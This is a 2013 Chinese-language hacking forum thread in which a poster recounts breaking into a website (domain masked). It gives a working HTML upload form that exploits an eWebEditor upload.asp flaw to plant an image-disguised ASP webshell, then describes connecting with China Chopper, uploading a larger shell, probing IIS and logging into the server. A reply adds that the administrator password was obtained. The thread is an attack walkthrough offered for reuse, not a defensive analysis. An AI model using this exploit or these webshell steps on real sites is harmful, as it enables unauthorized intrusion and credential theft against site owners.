xsxq123 发表于 2013-2-7 02:28:59

好吧 年前最后一站


目标站
扫目录扫出了一个

然后百度了一下 ewebeditor漏洞
利用以下代码 保存为1.html
<FORM encType=multipart/form-data method=post name=myform action=http://www.xxxx.cn/admin/ewebeditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp>
<Input style="WIDTH: 510px; HEIGHT: 18px" size=85 type=file name=uploadfile>
<Input value=upload type=submit> <BR></FORM
打开
1.html

上传一个图片合成马或是免杀小马(不然会出现乱码)

成功后看源文件

得到路径
http://www.xxxx.cn/uploadfile/Mr.DzY.asp/20130207021537820.jpg
菜刀连接

传大马就不用说了   用ASPX马探测IIS   

然后登陆服务器

结束      过年了大家好好过年 多陪陪家人   明年我们继续

xsxq123 发表于 2013-2-7 02:31:25

传错图了

635634436 发表于 2013-2-7 15:27:45

...这个网站是我发出去的啊:funk::funk::funk:   你是孤风? 还是他发给别人了:L

乐生乐道 发表于 2013-2-7 18:07:49

楼上的亮点啦。。。

冰刀 发表于 2013-2-8 23:06:41

擦= = 传大马就不用说了   用ASPX马探测IIS   怎么就没了...

xsxq123 发表于 2013-2-8 23:12:33

冰刀 发表于 2013-2-8 23:06 static/image/common/back.gif
擦= = 传大马就不用说了   用ASPX马探测IIS   怎么就没了...

直接探测出administrator的密码来了
页: [1]
查看完整版本: 好吧 年前最后一站